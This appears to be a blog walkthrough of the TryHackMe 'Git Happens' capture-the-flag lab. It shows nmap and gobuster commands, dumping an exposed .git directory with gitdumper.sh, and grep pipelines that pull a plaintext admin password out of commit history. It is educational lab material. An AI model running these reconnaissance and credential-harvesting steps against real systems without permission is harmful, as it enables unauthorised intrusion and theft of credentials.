In this CTF (Capture the Flag) walkthrough, we will be working through the TryHackMe challenge, Git Happens!
If you don’t want any spoilers, I’d recommend trying out this free hacking challenge first before reading any further. You can also watch the video where I’ll walk you through the whole challenge:
We’ll be hacking into a git repository and extracting the username:password combination for the administrative portal. We’ll make use of gittools to extract the early git commits and comments. The final step is to use some clever command line text parsing to quickly narrow things down to our password and username.
First let’s export our IPs:
export myIP=10.6.2.23
export targetIP=10.10.122.132
Now we’ll go ahead and connect to the TryHackMe VPN from our Kali VM (Virtual Machine). In the walkthrough video, I am running Manjaro Linux with a virtual Kali machine running on Gnome Boxes.
sudo openvpn kalisurfer.ovpn
Now that we are properly connected to our target machine let’s start the first phase of our hack.
Our standard Nmap scan has a few extra flags today to extend the functionality.
sudo nmap $targetIP -Pn -p- -sC -A -O -oN nmap-scan-results.txt
-Pn = skip host discovery (treat the host as online)
-p- = scan all 65535 ports
-sC = run the default scripts
-A = enable OS detection, version detection, script scanning, and traceroute
-O = detect the operating system
-oN [filename] = write output in normal format to [filename]
# Nmap 7.93 scan initiated Tue Dec 13 10:51:00 2022 as: nmap -Pn -sC -p- -O -oN nmap-scan.txt 10.112.132
Nmap scan report for 10.112.132 (10.112.0.132)
Host is up (0.0012s latency).
All 65535 scanned ports on 10.112.132 (10.112.0.132) are in ignored states.
Not shown: 64535 filtered tcp ports (net-unreach), 1000 filtered tcp ports (no-response)
Too many fingerprints match this host to give specific OS details
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 13 10:54:32 2022 -- 1 IP address (1 host up) scanned in 212.47 seconds
WALKING THE WEBSITE
We discover a login page by loading up our browser to our $targetIP. We try a few guesses of standard administrator user:password combinations without any luck.
DIRECTORY SNIFFING WITH GOBUSTER
Next, we will sniff out directories with GoBuster. With the following command, we discover a hidden page at
gobuster dir -w ~/hacking-tools/SecLists/Discovery/Web-Content/dirsearch.txt --url http://10.10.122.132
The hidden page looks like an index of the Git repo. We can download the files individually, but with Gittools we can extract even more metadata from the Git repo.
USING GITTOOLS TO EXTRACT REPO METADATA
First, we’ll download Gittools from the official Github repo.
After navigating into the new directory from Gittools, we run the gitdumper.sh script with our target address and download location.
Use the dumper:
./gitdumper.sh http://10.10.122.132/.git/ ~/THM/Git-Happens
Now we can view more details about the Git commits with the command ‘
COMMAND LINE TEXT PARSING
This next series of commands will help us to quickly narrow things down to our
git log | grep commit
This command displays the list of commits and hashes
git log | grep commit | cut -d " " -f2
Now we cut out just the list of hashes. The cut -d " " -f2 part of the command splits each line into fields using a space as the delimiter, and -f2 displays only field 2. If this was an Excel spreadsheet, it is as if we are only viewing column 2.
Next, we’ll send that output as a new input to the command git show <hash> with xargs:
git log | grep commit | cut -d " " -f2 | xargs git show
Let’s extend the command a bit further to save it to a
git log | grep commit | cut -d " " -f2 | xargs git show > gitcommits.txt
We can look through this .txt file manually, but it is faster to use “grep password” to find text lines with the word “password”:
cat gitcommits.txt | grep password
And to find the username:
Now we can find the password in plaintext with a simple glance over the output.
Thanks for watching! Catch you next time.
Feel free to check out our other TryHackMe walkthrough:
👉 Recommended: Web Hacking 101: Solving the TryHackMe Pickle Rick “Capture The Flag” Challenge
The two tracks used as background music are used under creative commons licenses and were downloaded at https://freemusicarchive.org
- Mr. Frisby’s Beat Pocket – Cool Fountains
- Damiano Baldoni – Gothic trip with thunderhorse
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.